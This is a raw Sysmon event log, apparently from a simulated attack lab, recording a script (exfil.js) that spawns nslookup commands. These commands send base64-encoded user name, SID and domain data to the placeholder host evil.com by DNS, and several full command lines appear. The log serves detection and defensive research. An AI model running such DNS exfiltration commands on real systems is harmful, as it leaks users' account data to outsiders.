14:21:56.810{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-FC46-000000005F02}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.810{2E1864BB-18E0-629A-6742-000000005F02}39762764C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-FC46-000000005F02}7036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.809{2E1864BB-1904-629A-FC46-000000005F02}7036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljdaua.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.806{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmwio.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.773{2E1864BB-1904-629A-FA46-000000005F02}2404216C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-FB46-000000005F02}4280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.773{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.773{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.773{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-FB46-000000005F02}4280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.773{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.773{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.773{2E1864BB-1904-629A-F946-000000005F02}55962616C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-FB46-000000005F02}4280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.780{2E1864BB-1904-629A-FB46-000000005F02}4280C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1904-629A-F946-000000005F02}5596C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmwio.tmp 2>&1 10341000x8000000000000000217272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.757{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-FA46-000000005F02}2404C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.757{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1904-629A-FA46-000000005F02}2404C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.757{2E1864BB-1904-629A-FA46-000000005F02}2404216C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-F946-000000005F02}5596C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.742{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-FA46-000000005F02}2404C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.742{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.742{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.742{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217265Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.742{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217264Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.742{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F946-000000005F02}5596C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217263Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.726{2E1864BB-18E0-629A-6742-000000005F02}39763712C:\Windows\System32\WScript.exe{2E1864BB-1904-629A-F946-000000005F02}5596C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217262Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.741{2E1864BB-1904-629A-F946-000000005F02}5596C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmwio.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217261Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.726{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlquio.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217260Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.710{2E1864BB-1904-629A-F746-000000005F02}14326020C:\Windows\system32\conhost.exe{2E1864BB-1904-629A-F846-000000005F02}3832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217259Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.710{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217258Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.710{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217257Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.710{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217256Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.710{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217255Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.709{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-1904-629A-F846-000000005F02}3832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217254Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.708{2E1864BB-1904-629A-F646-000000005F02}66888036C:\Windows\system32\cmd.exe{2E1864BB-1904-629A-F846-000000005F02}3832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217253Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:56.708{2E1864BB-1904-629A-F846-000000005F02}3832C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com 